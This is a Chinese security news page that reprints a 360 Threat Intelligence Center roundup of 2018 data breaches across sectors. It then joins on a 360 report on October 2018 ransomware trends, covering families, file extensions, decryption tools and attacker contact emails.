2018年4月4日,网络安全公司KrebsOnSecurity在本周一发表的文章中指出,美国最大面包连锁店Panerabread旗下网站panerabread.com泄露了数百万顾客记录,包括姓名、生日、电子邮箱地址、家庭住址以及信用卡号码的最后四位数字。

KrebsOnSecurity还表示,在他们与该公司取得联系后,该网站已在周一早些时候离线。而截止到这个时间,这起数据泄露事件至少已经持续了长达八个月的时间。

安全研究人员已在去年8月通知了该公司。当被问及到在2017年8月进行通报后直到现在以来,是否看到有任何迹象表明Panerabread曾试图解决这个问题时,Houlihan表示“从来没有”。目前尚不清楚该公司的网站到底暴露了多少顾客记录,但该网站索引的增量客户数据表明,这个数字可能高于700万。

(六十九) 内鬼作祟!可口可乐承认8000名员工的个人信息被泄漏

2018年5月25日,据外媒 Bleeping Computer报道,可口可乐公司本周对外宣布了一起数据泄露事件,他们在前员工的个人硬盘中,发现了大量现有员工的个人数据,而这些数据,是该前员工从可口可乐违规挪用的。

这起泄漏时间从去年9月被发现,直到本周才对外宣布。事件影响8000可口可乐员工。目前,可口可乐正通过第三方供应商向受影响的员工提供一年的免费身份监测。

(七十) 纽约9家B&BHG餐厅遭恶意软件感染,顾客支付卡数据泄漏

2018年7月,据多家国外媒体报道,B&BHG酒店集团(B&B Hospitality Group)证实该集团在纽约市运营的9家餐厅所配备的销售终端(POS)被发现感染了恶意软件。初步调查结果显示,此次黑客入侵发生在2017年3月1日至2018年5月8日之间,黑客可能已经偷走了支付卡号码、持卡人姓名、支付卡有效日期、内部验证码以及其他一些付款信息。

第三方网络风险管理平台公司CyberGRX的首席执行官Fred Kneip表示:“一个企业数字生态系统中的所有第三方都需要不断评估他们引入的风险水平,这一点对于销售终端解决方案提供商来说尤其重要,因为他们能够访问所有的支付数据。”

(七十一) 新西兰网盘Mega上万帐号密码遭泄露,被公开在VirusTotal上

2018年7月17日,据外媒 ZDNet 报道,Mega —— 这家于新西兰成立并提供在线云存储和文件托管服务的公司,目前被发现其平台中有成千上万的帐号凭证信息已在网上被公开发布。被泄露的信息以文本文件形式提供,涉及超过 15,500 条用户名、密码和文件名的数据。

这份文本文件最早由Digita Security公司的首席研究官和联合创始人 Patrick Wardle 于6月份在恶意软件分析 VirusTotal 上发现,而这份文件是在几个月前由一名据称在越南的用户上传的。

(七十二) 云泄露最前线:巴西订阅视频服务Sky Brasil暴露32.7万用户信息

2018年12月4日,独立研究员Fabio Castro发现,巴西最大的订阅电视服务公司Sky Brasil泄露了32.7万用户的信息,包括28.7GB的日志文件和429.1GB的API数据,这些数据涉及姓名,家庭住址,电话号码,出生日期,客户端IP地址,付款方式和加密密码。

虽然Castro发现了这一事件后通知了Sky Brasil,公司随后也对数据库进行了密码保护;但其服务器至少从10月中旬就开始在Shodan上被编入索引,目前还不清楚数据库的访问者数量。

(七十三) 知名运动品牌Under Armour 1.5亿用户数据被泄露,称不涉及敏感信息

2018年3月30日,据报道,本周四,美国著名运动装备品牌Under Armour称有1.5亿 MyFitnessPal用户数据在上个月被泄露了,MyFitnessPal是一款Under Armour旗下的食物和营养主题应用。

此次关于用户数据泄露的声明使得该公司的股票价格下跌了2.4%。据该公司称,此次数据泄露事件影响到的用户数据包括用户名、邮箱地址、和加密的密码。该运动装备制造商称,是在3月25日才发现的此次数据泄露事件,并从那时就开始通知受影响用户。

(七十四) 珠宝电商MBM公司130万客户信息泄漏,内含明文密码

2018年3月18日,据雷锋网报道,MBM 公司被德国安全公司Kromtech Security 的研究人员抓住了小辫子。研究人员在不安全的亚马逊 S3 存储桶中发现了该公司的MSSQL 数据库备份文件。

最初,研究者怀疑这些数据归沃尔玛所有,因为这个存储桶被命名为“walmartsql”,不过后来他们通过分析后发现,这些数据的主人其实是 MBM 公司。在对泄露文档作了进一步评估后他们发现,这里容纳了超过 130 万人(准确来说是 1314193 人)的私人敏感数据。这些数据包含个人住址、email 地址、IP 地址和邮政编码,许多客户的密码甚至直接用明文显示,毫无安全性可言。

安全专家支招称,直接把敏感信息存入一个向公众开放的存储桶可不是什么高明的决定,没有对密码进行加密更是不可饶恕。

十、 物联网
(七十五) 俄罗斯视频监控公司iVideon数据泄露,涉及超过82万名用户个人信息

2018年5月14日,Kromtech安全中心的研究人员在最近发现,一个归属于俄罗斯视频监控公司iVideon的MongoDB数据库并没有得到保护,并向公众开放。

从数据库的内容来看,它似乎涵盖了iVideon公司的整个用户群,包括其用户和合作伙伴的登录名、电子邮箱地址、密码哈希值、服务器名称、域名、IP地址、子帐户以及软件设置和付款设置信息(并不包括任何信用卡数据)。有超过82万(825388)名用户以及132家合作伙伴受到影响。

(七十六) 神乎其神!北美某赌场因联网鱼缸漏洞被黑,客户信息全泄露

2018年4月17日,据报道,网络安全公司 Darktrace 的首席执行官 Nicole Egan 在上周四于伦敦举办的一次会议上演示了黑客如何通过入侵赌场走廊上水族馆中的联网恒温器黑掉一个名称未被透露的赌场。

黑客利用了恒温器中存在的一个漏洞在网络中站稳脚跟,随后,其设法访问了赌徒中豪掷重金的人的数据库,“然后在网上拉回来拉出恒温器并拉向云。”尽管 Eagan 并未透露这家赌场的身份信息,但她分享的这次安全事件可能发生在去年。当时 Darktrace 公司发布了一份报告,说明了位于北美的一家赌场遭到了这类恒温器攻击。

十一、 医疗卫生
(七十七) MongoDB数据库意外暴露两百多万墨西哥公民的医疗健康数据

2018年8月,据BleepingComputer报道,一个MongoDB数据库被发现可以通过互联网公开访问,其中包含了超过200万(2,373,764)墨西哥公民的医疗健康数据。这些数据包括个人的全名、性别、出生日期、保险信息、残疾状况和家庭住址等信息。

这个数据库是由安全研究员Bob Diachenko通过Shodan发现的,Shodan是一个搜索引擎,可以搜索所有联网设备,而不仅限于Web服务器。当被发现时,这个数据库完全暴露在互联网上,任何人都可以对其访问和编辑,因为它没有设置密码。“MongoDB的安全隐患问题至少从2013年3月开始被人们所知道,从那以后就开始被广泛报道……不安全的数据库仍然大量暴露在互联网上,此类数据库至少有54,000个。”

(七十八) 澳大利亚SA Health医院意外暴露7200名儿童个人资料

2018年8月7日,据报道,澳大利亚SA Health在其官方网站上发布了一篇新闻稿,称旗下位于澳大利亚第五大城市阿德莱德的妇女儿童医院(Womens and Childrens Hospital)因工作人员操作失误,意外暴露了约7200名儿童的医疗记录和个人资料。其中,包括1996年至2005年期间在该医院接受百日咳、胃肠和呼吸道感染治疗的患者的详细资料。

根据SA Health的说法,这些数据早在2005年就已经可以被公众通过互联网访问,直到在上周三有患者的父母在线注意到这些数据后,医院方面才得知了这一事件。这也意味着,这些数据已经在线暴露近13年!

(七十九) 美国医疗保健公司Blue Springs Family Care近4.5万条患者记录遭泄露

2018年7月31日,最近的新闻报道显示,Blue Springs Family Care遭遇了勒索软件攻击,而被落入攻击者手里的数据达到了近4.5(44,979)万条。

在该公司的一封公开信中指出,攻击者可能获得了各种患者记录信息,这至少包括:患者的全名、住址和出生日期、帐号、社会保险号、残疾等级、医疗诊断和驾驶执照/身份证号码。

公开信还透露,2018年5月公司曾遭受勒索软件攻击。Blue Springs Family Care表示,他们已经与另一家电子健康记录提供商达成合作协议,而这个新的合作伙伴会对所有健康数据进行加密保护。

(八十) 美国医疗公司LifeBridge Health泄露近50万患者个人信息

2018年5月22日,根据《巴尔的摩太阳报(Baltimore Sun)》在本周二刊登的一则报道,LifeBridge Health公司日前向近50万位患者发出通知称,他们的个人信息可能会因为网络黑客攻击事件而遭到暴露。

根据LifeBridge Health官方的说法,这一事件最初是在今年3月份被发现的,当时他们在一台服务器上发现了恶意软件,而该服务器被用于为医疗系统的附属医师小组以及共享注册和计费系统提供电子医疗记录数据。

LifeBridge Health通过电子邮件告知患者,根据第三方安全公司的调查结果来看,数据泄露最初开始于2016年9月27日,遭泄露的信息包括患者的姓名、家庭住址、出生日期、保险信息和社会安全号码。

(八十一) 美国医疗转录公司MEDantex意外暴露数千名医生提交的患者记录

2018年4月,KrebsOnSecurity在上周五(4月20日)了解到,MEDantex旗下的一个门户网站存在泄露患者医疗记录的安全隐患。该网站允许医生上传音频文件。这个功能页面原本是应该得到加密保护的,但事实证明任何互联网用户都可以对其进行访问。

MEDantex是一家总部位于美国堪萨斯州的医疗转录公司,它的主要业务即是为医院、诊所和私人医生提供定制的转录解决方案。KrebsOnSecurity表示,他们目前尚不清楚在MEDantex网站上具体有多少患者的医疗记录遭到了暴露,但其中一个被命名为“/ documents / userdoc”的目录包含了与2300多名医生相关的文件。目录以按字母顺序排列,每一个目录中都包含有不同数量的患者医疗记录,其中的Microsoft Word文档和原始音频文件都可以被下载。

(八十二) 挪威过半人口医疗数据疑遭泄漏,攻击者“高阶且专业”

2018年1月19日,挪威当地媒体报道称,负责管理挪威东南部地区医院的机构Health South-East RHF宣布网站遭泄露事件,超过290万用户,超过挪威(总人口520万)一半的人口可能受影响。该组织表示,挪威医疗部门的计算机紧急响应中心HelseCERT 发现来自 HealthSouth-East计算机网络的可疑流量;一名黑客或黑客组织可能已经盗取了上述人口的医疗数据。

Health South-East RHF 和其母公司Sykehuspartner HF 发布联合声明称,“情况严重,并已采取措施限制该事件造成的损害。”Health South-East RHF 将攻击者描述为“高阶且专业”。另外已将该事件通知挪威CERT团队即 NorCERT。

(八十三) 为防止再次发生泄漏事件,新加坡公共医疗领域电脑暂时“断网”

2018年7月23日,新加坡卫生部称,公共医疗机构使用的电脑已暂停接入互联网,防止类似新加坡保健服务集团(新保集团)数据库遭网络攻击事件再度发生。

新加坡公共医疗机构多项服务依靠互联网,切断工作人员所用电脑与互联网的连接可能延长等待时间,给病人带来不便。

据了解,新保集团数据库6月底开始遭网络攻击,大约150万名病人个人资料失窃,新加坡总理李显龙、荣誉国务资政吴作栋及多名部长的个人资料和门诊记录也被窃取,新加坡政府已成立独立调查委员会调查此事。

(八十四) 英国知名药妆店Superdrug近2万名顾客个人信息遭泄露

2018年8月24日,据报道,有黑客在本周一(8月20日)联系了英国知名药妆店Superdrug,称他们已经获得了大约2万名Superdrug顾客的详细个人信息。作为证据,黑客还向Superdrug展示了386名顾客的个人信息记录。

Superdrug号称英国第二大美容和健康零售商,占据英国30%市场份额。经过Superdrug的确认,被窃取的个人信息包括顾客的姓名、住址,以及部分顾客的出生日期、电话和积分余额。不过,Superdrug坚称被黑客窃取的凭证是从入侵第三方得来的,而并非通过入侵Superdrug的系统。之所以能够进一步获取到Superdrug顾客的详细个人信息,这是因为黑客利用了人们有在各种在线服务使用相同密码的习惯。

(八十五) 遭遇网络钓鱼攻击,美国奥古斯塔大学医疗中心泄露41.7万份记录

2018年8月21日,据报道,奥古斯塔大学医疗中心在去年曾遭遇了一次网络钓鱼攻击。最新调查显示这次攻击导致约41.7万份记录遭泄露。遭泄露的数据包含了患者个人信息,以及他们的医疗和健康记录。对于其中一些受害者来说,遭泄露的数据还可能包含财务记录和社会安全号码。

根据该校网站上最新发布的安全通知来看,攻击发生在2017年9月10日至11日。最初,该校认为攻击仅暴露了“少量的内部电子邮件帐户”。然而,在今年,他们意识到约有41.7万份记录因此遭到泄露。

奥古斯塔大学已经准备向每一名受害者发送个人电子邮件,以通知他们有关此次事件,并为社会安全号码遭到泄露的人提供为期一年的免费信用监控服务。

(八十六) 优步270万用户信息被黑客盗取,遭英国监管机构罚款38.5万英镑

2018年11月27日,优步(Uber)近日被英国媒体曝光:旗下约270万英国用户个人信息在2016年被黑客盗取,而最夸张的是优步为了“息事宁人”居然支付了10万美元给黑客,因此被英国监管机构重罚38.5万英镑。

据报道,英国政府Information Commissioner’sOffice(ICO)表示,优步在遭遇黑客攻击后,没有第一时间告知被泄露的用户有关细节,反而支付赎金,这一做法是对用户和优步司机信息安全性的漠视。ICO将这次的黑客行为定义为“严重违法行为”。

目前,ICO正在对案件进行进一步的调查。该办公室还指出,已经在优步的系统中发现了一系列可获得数据的安全漏洞,黑客从一个优步运营的云储存系统中可以下载数以百万计的客户的敏感信息,已掌握了2016年10月和11月被攻击的犯罪事实。

十二、 制造业
(八十七) 巴西最大工业协会被指数据泄露,数千万个人信息可互联网访问

2018年11月,据报道,白帽黑客生态系统Hacken Proof的安全研究员鲍勃·迪亚琴科(Bob Diachenko)称其发现了三个包含个人记录的数据库,可通过Elasticsearch搜索引擎访问这些记录。最大的数据源包含3480万个条目。据迪亚琴科称这些数据已在网上暴露数日。

而被指控泄露上述数据的主体是巴西圣保罗州工业联合会(简称FIESP),FIESP代表了约13万家公司,是巴西工业部门的最大企业实体。这些外泄记录包括:姓名、ID与社会安全号码、完整住址信息以及电子邮件与电话号码。

关于该数据泄露事件,该研究员称其已试图警告FIESP,但无济于事。Hacken Proof在推特上首次公开该泄露事件后,一位巴西粉丝将该数据泄露事件告知了企业,企业这时才离线了数据库。

(八十八) 史上最严重数据车祸:100+车厂机密全曝光,通用丰田特斯拉统统中招

2018年7月22日,据报道,加拿大汽车供应商Level One被UpGuard的研究员Chris Vickery发现,该厂商的数据后门大开,黑客可轻松访问其100多家合作伙伴车厂的机密文件。这100多家车厂,从通用汽车、菲亚特克莱斯勒、福特、丰田,大众到特斯拉,都名列其中。

而被泄露的数据,从车厂发展蓝图规划、工厂原理、制造细节,到客户合同材料、工作计划,再到各种保密协议文件……甚至员工的驾驶证和护照的扫描件等隐私信息,共计157千兆字节,包含近47,000个文件。在反复检查过程中,Chris Vickery确认,通过Level One的文件传输协议rsync,可以无障碍访问上述所有隐私数据。

(八十九) 特斯拉起诉前员工:黑进内部生产系统盗取并泄露机密数据

2018年6月,据美国内华达州联邦法庭公布的诉讼文件显示,特斯拉起诉了一名该州TeslaGigafactory超级工厂的一名前员工马丁·特里普(Martin Tripp),称其盗取了该公司的商业机密并向第三方泄露了大量公司内部数据。

据诉讼文件显示,该名员工承认曾开发恶意软件进入特斯拉内部生产操作系统,偷取大量数据并交给第三方,还向媒体发表不实言论。这些被泄露的数据包括“数十份有关特斯拉的生产制造系统的机密照片和视频”。

特里普开发的恶意软件安装在了三台不同员工的电脑上,所以在他离开特斯拉后,还能继续从该公司传输数据到第三方。而电脑被安装该恶意软件的员工也将受到牵连。

十三、 其他
(九十) 国泰航空940万名乘客个人数据被盗,包含出行地点数据

2018年10月25日,据外媒报道,大型国际航空公司国泰航空披露,在今年3月发生的一次数据泄露事件中,该公司的940万名乘客的记录被盗,另外含有姓名、出生日期、住址等个人信息的护照信息也可能已经泄露。据悉,此次事件还涉及到了每位乘客的具体出行地点以及客户服务代表的评论等等。

另外,国泰航空还指出,有403个过期信用卡卡号、27个没有CVV号码的信用卡卡号遭到访问。但是,没有密码遭到泄露。

这家公司选择在6个月后公布数据泄露事件的做法也许会在欧洲市场遇到阻碍,因为那边最新通过的通用数据保护条例要求公司在发现违规情况三天后就要告知客户和执法部门。

(九十一) 丽笙酒店集团遭遇数据泄露,官方称受影响会员不足10%

2018年11月2日,据英国The Register报道,丽笙酒店集团(Radisson hotel Group,以下简称“丽笙”)已经于10月30日开始向参与其奖励计划的会员发出电子邮件,确认了一起黑客攻击。丽笙在其声明中没有提到黑客侵入了哪个系统,也没有提供其他技术细节。其发言人表示,此次事件只影响不足10%的丽笙奖励计划会员账户。

丽笙在其发出的电子邮件中表示,此次数据事件并不涉及任何信用卡或密码信息,目前已经被确认能够被黑客访问的信息仅限于会员的姓名、住址(包括居住国)、电子邮箱地址,以及一部分会员的公司名称、电话号码、丽笙奖励计划会员编号等信息等。

(九十二) 开发者安全预警:数万Jenkins暴露在网上,已发现大量敏感数据

2018年1月23日,研究人员表示,没有利用任何漏洞,就在互联网上发现了暴露2.5万个Jenkins实例,从这些实例中发现了不少大型公司泄露了敏感证书和日志文件,这都可能会引发数据泄露事件。

Jenkins是最受欢迎的开源自动化服务器,由CloudBees和Jenkins社区维护。 自动化服务器支持开发人员构建,测试和部署其应用程序,在全球拥有超过133,000个活跃安装实例,用户超过100万。

上述2.5万个实例中,10-20%的实例存在配置错误,这些错误配置的实例,大多也都泄露了敏感信息,包括专用源代码库的证书,部署环境的证书(例如用户名、密码、私钥和AWS令牌)以及包括凭证和其他信息的作业日志文件敏感数据。

(九十三) 澳大利亚国家绝密文件被卖二手店

2018年2月1日,澳大利亚政府的某人决定卖掉两个尘封已久的文件柜卖掉,因为他们丢掉了文件柜钥匙;随后买家用一把电钻打开了柜——连续五届政府在储藏柜放着的文件。

最终,这些文件辗转到达澳大利亚广播公司 (ABC) 的手中,这家媒体目前正在发布他们认为安全的资料。ABC 披露的文档中包括Rudd 政府如何计划资助澳大利亚已引发争议的国家宽带网络 (NBN) 的机密简讯。该公司播报人员表示“不会发布涉及国家安全、或者信息已公开、或涉及公务员的隐私的文档”。

(九十四) 3500万美国选民记录黑客论坛有售

2018年10月24日,美国11月中期选举临近,AnomaliLabs 和 Intel 471 的研究人员发现某黑客论坛上竟然在售卖3500万条美国选民的记录,牌出售的选民记录来自美国19个州的2018选民登记,包括威斯康辛、得克萨斯和佐治亚州。据称该选民数据记录包含全名、电话号码、住址、选举历史和其他未明确的选举数据。

号称有600万选民的威斯康辛州,选民记录价格为1.25万美元。其他州的选民信息报价在几千美元,到几百美元不等。卖家承诺,每周都会在从州政府线人处收到信息时更新选民登记数据。令人匪夷所思的是,售卖信息刚贴出来几小时后,论坛上就出现了众筹购买该选民记录的活动。

(九十五) Google Groups配置不当,一大波财富500强公司敏感信息遭泄露

2018年6月,Kenna Security 公司研究员指出,由于Google Group配置出错,导致数千家组织机构的某些敏感信息被泄露。这些受影响组织机构包括财富500强公司、医院、高等院校、报纸和电视台以及美国政府机构等。根据样本统计,约31%的 GoogleGroups会导致泄露数据。

独立研究员 Brain Krebs 上周五发布分析结果表示,“除了泄露个人信息和金融数据外,配置错误的 GoogleGroups 账户有时候还公开检索关于组织机构本身的大量信息,包括员工使用手册链接、人员配备计划、宕机和应用 bug 报告以及其他内部资源。

研究人员指出,“鉴于这种信息的敏感特征,可能会引发鱼叉式钓鱼攻击、账户接管和多种特定案例的欺诈和滥用情况。”

(九十六) MongoDB可公开访问,美国慈善机构Kars4Kids泄露上万名捐赠者个人信息

2018年11月3日,网络安全咨询公司Hacken的网络风险研究主管BobDiachenko发现了一个似乎是可公开访问的MongoDB数据库。经过进一步调查,这些数据似乎包含了21,612名Kars4Kids捐赠者的电子邮箱地址和其他个人信息,以及超级管理员用户名和密码。

Kars4Kids是一家成立于1994年的慈善机构,总部设在美国新泽西州莱克伍德,将其大部分收益都捐赠给了Oorah,一个以解决“犹太儿童及其家庭的教育、物质、情感和精神需求”为目标的国家组织。

据分析,有网络犯罪分子可能已经使用这些用户名和密码访问了Kars4Kids仪表板的内部帐户,这将使得他们能够访问更敏感的数据。例如,度假券(向捐赠者提供的免费假期)和收据,以及包括电子邮箱地址、家庭住址和电话号码等在内的个人信息。

(九十七) MongoDB配置不当,近70万美国运通印度分公司客户联系信息遭泄露

2018年11月,据外媒ZDNet报道,近70万名美国运通(Amex)印度分公司客户的个人详细信息在最近被一名安全研究人员发现通过一台存在配置错误的MongoDB服务器暴露在了网上。

大约在三个星期以前,国际网络安全咨询公司Hacken的网络风险研究主管Bob Diachenko发现了这台漏洞百出的服务器。该服务器不仅能够被公开访问,而且没有设置密码。

据研究员表示,这些以明文形式存储的记录包含了美国运通印度分公司客户的个人详细信息,如电话号码、全名、电子邮箱地址和支付卡类型等。虽然这些数据似乎并不过于敏感,但很可能会对垃圾电子邮件活动起到推动作用。

(九十八) MongoDB数据库配置不当,数万Bezop代币用户个人信息泄露

2018年4月,据报道,网络安全公司Kromtech偶然发现了一个未加密的MongoDB数据库,其中包含了超过25,000名Bezop用户的详细个人信息,其中一部分是6,500名Bezop(BEZ)加密货币的投资者,剩余部分则单单只是Bezop代币的接收者。

安全研究人员称,这个向公众开放的数据库包含了姓名、家庭住址、电子邮箱地址、加密密码、钱包信息以及护照、驾驶执照或身份证的扫描件等敏感信息。

数据库所存储的这些信息与Bezop团队在年初开始运行的“ 赏金计划 ” 有关。在此期间,该团队将Bezop代币分发了给在其社交媒体帐户上推广该货币的用户。

(九十九) 半年186家!日企机密文件大量被“晒”百度文库

2018年3月,据调查企业信息泄露情况的相关公司的统计,最近半年多时间,186家日企的文件被发布到文档分享网站上。这可能导致专利信息的泄露等,专家呼吁日本企业加强内部管理。

发布日本企业内部文件的是中国百度运营的文档分享网站“百度文库”。日本IT相关公司“CROSSWARP”调查显示,仅2017年6月~2018年2月期间,上述近200家日企的文件被发布到百度文库上。这些资料上均标有注意字样,意味着属于“机密”文件。

熟悉中国法律的律师分部悠介表示,在中国泄露企业营业机密也属于违法行为,不过只有受害金额较大等情况下才会适用刑事处罚。另外,由于要证明网上的投稿使企业蒙受严重损失十分困难,因此很难通过刑事处罚来遏制这种行为。

(百) 美国大数据营销公司因失误泄露2TB隐私信息,涉2.3亿人

2018年6月28日,据Wired报道,本月初曝光的市场和数据汇总公司Exactis服务器信息暴露的事情经调查为实。Exactis此次的信息泄露并不是黑客撞库引起或者其它恶意攻击,而是他们自己的服务器没有防火墙加密,直接暴露在公共的数据库查找范围内。

据了解,Exactis采集了大约3.4亿条记录,大小2TB,可能涵盖2.3亿人,几乎是全美的上网人口。虽然上述信息中不包含信用卡号、社会保障号码等敏感的金融信息,但是隐私深度却超乎想象,包括一个人是否吸烟,他们的宗教信仰,他们是否养狗或养猫,以及各种兴趣,如潜水和大码服装,这几乎可以帮助构建一个人的几乎完整“社会肖像”。

(百一) 咨询公司Rice Consulting云泄露大量敏感数据:曾为美国民主党筹款432万美元

2018年10月30日,Hacken网络风险研究主管BobDiachenko在本月17日通过Shodan搜索引擎发现了一台因配置错误而公开暴露在互联网上的BuffaloTeraStation NAS网络附加存储器,所有者是总部位于美国马里兰州的Rice Consulting咨询公司。

根据Rice Consulting官方网站所展示的信息来看,该公司曾在2017年与美国民主党合作(Democratic Party US),为其筹集资金超过432万美元。NAS包含了有关Rice Consulting过去数千次筹款活动的详细信息,如姓名、电话号码、电子邮箱地址、地址、公司、合同、会议记录、桌面备份、员工详细信息等。

Diachenko表示,他在NAS上发现的“最重要的资产”是NGP的用户名和密码组合。但遗憾的是,所有这些用户名和密码都被存储在一个没有设置密码的Excel文件中。

本文转载自: 360威胁情报中心
如若转载,请注明出处: https://mp.weixin.qq.com/s?timestamp=1547619833&src=3&ver=1&signature=uRwEXeQejyKzota10YMLCyKcoIuYkv-rjDzhVIEVkQ*d4uF0kMW-odNJ*Im72*Cops4NvK8uSKHW4W8pqqRxgplg68gnSKdgjkzqZ0ES9nEKcbEuPCgMEaywo5XV-sz4-e0*00Ia*2YAHgHgIXcH7NMuSDkeoJ8ctQRSwKu3bVQ=
安全客 – 有思想的安全新媒体
安全资讯 数据泄露

360威胁情报中心 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
2019-02-23 19:55:32

WordPress 5.0 RCE 详细分析
2019-02-22 16:45:18

某php开源cms有趣的二次注入
2019-02-22 16:30:08

三层网络靶场搭建&MSF内网渗透
2019-02-22 14:30:46
|发表评论
发表你的评论吧
昵称
土司观光团
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
360威胁情报中心
这个人太懒了,签名都懒得写一个
文章
87
粉丝
27
TA的文章
盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15
1月政企终端安全态势分析报告
2019-02-18 15:19:45
疑似Molerats APT组织针对中东地区的最新攻击活动分析
2019-02-15 10:38:53
2018年全球十大APT攻击事件盘点
2019-02-08 10:07:13
全球高级持续性威胁2018年总结报告
2019-02-06 10:47:02
输入关键字搜索内容
相关文章
2月23日每日安全热点 – 18年成人网站出售账户信息广告增长一倍
从RSA 2019创新沙盒“十强”看网络安全技术动向
2月22日每日安全热点 – Adobe再次为Reader推送补丁以防止重要信息的泄露
2月21日每日安全热点 – WinRAR中存在19年的代码执行漏洞
GitHub上发布后即登顶的老司机渗透教程,你的小本本备好了吗?
“高价收购私人微信号”的局中局
2月20日每日安全热点 – 社工妹子跟踪狂
热门推荐
文章目录
国内机构重大数据泄露案例
一、 内部威胁
二、 外部威胁
国外各行业信息泄露案例
一、 IT信息企业
二、 政府机构
三、 电信运营商
四、 互联网
五、 交通物流
六、 教育
七、 金融
九、 生活服务
十、 物联网
十一、 医疗卫生
十二、 制造业
十三、 其他
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

勒索病毒

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP
2018年10月国内勒索病毒疫情分析
阅读量 131206 | 评论 8

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-11-07 14:28:32

随着勒索病毒的广泛传播,给企业和个人的数据带来严重的威胁,360互联网安全中心针对勒索病毒进行了多方位的监控与防御。从本月的反馈数据来看,勒索病毒的传播量总体呈下降趋势,而由于系统存在漏洞导致被感染的用户占比,则在本月有所上涨。

感染数据分析
通过对本月勒索病毒的感染数据进行统计分析,10月相对于9月反馈数量有小幅度下降。10月份整体反馈下降的主要原因是受弱口令爆破影响被感染的系统数量减少,但针对存在此类风险的环境(例如开启远程桌面功能,使用共享文件夹,mssql数据库服务,Tomcat等),仍应重视弱口令攻击问题。

图1. 2018年反馈数量统计

通过对360防护数据中心监控的数据分析进行,在10月22号有一次小规模的勒索病毒爆发。此次小规模的爆发的主要是由GandCrab勒索病毒传播引起,最主要传播途径是口令爆破。

图2. 10月份勒索病毒感染趋势

分析10月份勒索病毒家族分布情况,GandCrab家族超越了之前占据榜首的Crysis家族和GlobeImposter家族,成为传播量最大的一个家族。分析了其部分原因:

GandCrab病毒在暗网中进行售卖,使用分成模式,购买该勒索病毒的群体比较多。
该勒索病毒制造者,还创建维护了一个GandCrab病毒传播者社区,招募病毒传播者,并提供技术支持。使用门槛上要比另外几大勒索病毒低。
GandCrab勒索病毒引发的新闻事件最近较多,影响范围扩大(例如本月被广泛播报的新闻——叙利亚一位父亲在twitter上发布帮助请求,自己已逝儿子留下的照片被GandCrab勒索病毒加密事件),这也在一定范围内提升了其 “知名度”,而其中不乏有所图谋的不法分子。

图3. 10月勒索病毒反馈分布

被感染系统中,Windows7系统仍是占比最大。

图4. 10月被感染系统统计

通过对9月份和10月份被感染系统进行对比分析:发现在10月份中,被感染的服务器占比继续上升。近几个月,服务器的感染量占比逐月上升,不仅是因为服务器被攻击的价值更大,还因为服务器上部署的服务更多,暴露面更大,对服务器的攻击一直居高不下。

图5. 9月与10月被感染系统对比图

勒索病毒最新情报
如前文所述,本月Crysis家族和GlobeImposter家族的传播量在本月都有下降,但从使用的版本来看,两个家族都还在对病毒进行不断的更新,因此对于弱口令的防护仍旧需要提高重视。本月Crysis新增后缀XXXX和BETTA;GlobeImposter家族新增后缀Help4444和Crypted_bizarrio@pay4me_in。

家族 Crysis家族 GlobeImposter家族
后缀 COMBO Dragon4444
GAMMA Snake4444
BIP Horse4444
BGTX Rooster4444
XXXX Help4444
BETTA ALCO
– ROCK
– crypted_bizarrio@pay4me_in
– ZYX

{MOLLYGREENS@PROTONMAIL4.COM}MG

表1. Crysis家族,GlobeImposter家族本月使用后缀

在本月,通过RDP传播的GandCrab勒索病毒在10月22号达到了高峰,而利用漏洞进行传播的GandCrab勒索病毒则是在10月25号达到的最高峰。

图6. GandCrab勒索病毒家族本月传播趋势

在10月25日达到传播量顶峰的主要原因是该勒索病毒之前的版本已被成功破解,勒索病毒制造者也在这天发布了新版本的勒索病毒。感染之前版本GandCrab的用户可以通过“360解密大师”进行解密,支持包括GandCrab V5.0.3在内的之前的所有版本。

图7. 解密被GandCrab加密的文件

在处理用户求助中,发现仍旧有用户是因为下载破解软件导致机器被勒索。在此再次提醒广大用户,如果下载的破解软件被杀毒软件提示病毒并查杀,一定不要冒险运行,其中很有可能含有病毒木马。下图就是GandCrab勒索病毒的下载页面,下载回来的程序会加密你的文件,且最新版本的GandCrab勒索病毒目前无法破解。

图8. GandCrab勒索病毒常见诱导下载页面

此外,根据360防护中心监控到的数据发现:Satan勒索病毒已更新到V4.2版本,在最新版本中新增加了利用CVE-2018-2894(WebLogic任意文件上传漏洞)进行传播。

图9. CVE-2018-2894漏洞利用

从数据上看,Satan是从本月10月15日开始爆发,并在10月27号当天传播量达到最高峰的。360安全研究人员对最新版本的Satan样本进行分析发现——该勒索病毒的加密手段可以被破解,并在10月22号发布了Satan V4.2版本的解密工具。

图10. Satan勒索病毒传播趋势

本月我们还监控到了一款新的勒索病毒——sicck。该勒索病毒会向用户索要1个比特来解密文件,但它的勒索提示信息在生成上存在一定问题——只有在管理员权限下运行,才能成功生成勒索提示信息。

图11. sicck勒索病毒提示信息

在对sicck勒索病毒分析时发现,在加密用户系统内文件时需要跳过一些文件夹不进行加密,这其中包含360相关的文件夹,该勒索病毒很有可能是一个国产的勒索病毒。

图12. sicck勒索病毒分析

黑客信息
以下是10月份以来黑客在使用的勒索病毒联系邮箱

crypted_bizarrio@pay4me_in

MOLLYGREENS@PROTONMAIL1.COM

onionhelp@memeware.net

sicck@protonmail.com

crypted_marztoneb@tutanota_de

uncrypte@india.com

Help_Files@aol.com

makaylabz10owilson@aol.com

GoldenYogi@protonmail.com

supportfiless24@protonmail2.ch

eight1.hundred

johnstang@zoho.eu

MOLLYGREENS@PROTONMAIL4.COM

supplng@protonmail.com

johnsmith987654@tutanota.com

fyffe.c@aol.com

bhurda@aol.com

kts2018@protonmail.com

bitsupportx@protonmail.com

judnickrengasami@aol.com

Darknes@420blaze.it

stopencrypt@qq.com

jumanji07@cock.li

helpersmasters@xmpp.jp

supports@cock.li

WriteToUs@firemail.cc

yourhope@airmail.cc

buydecrypt@qq.com

lybot@keemail.me

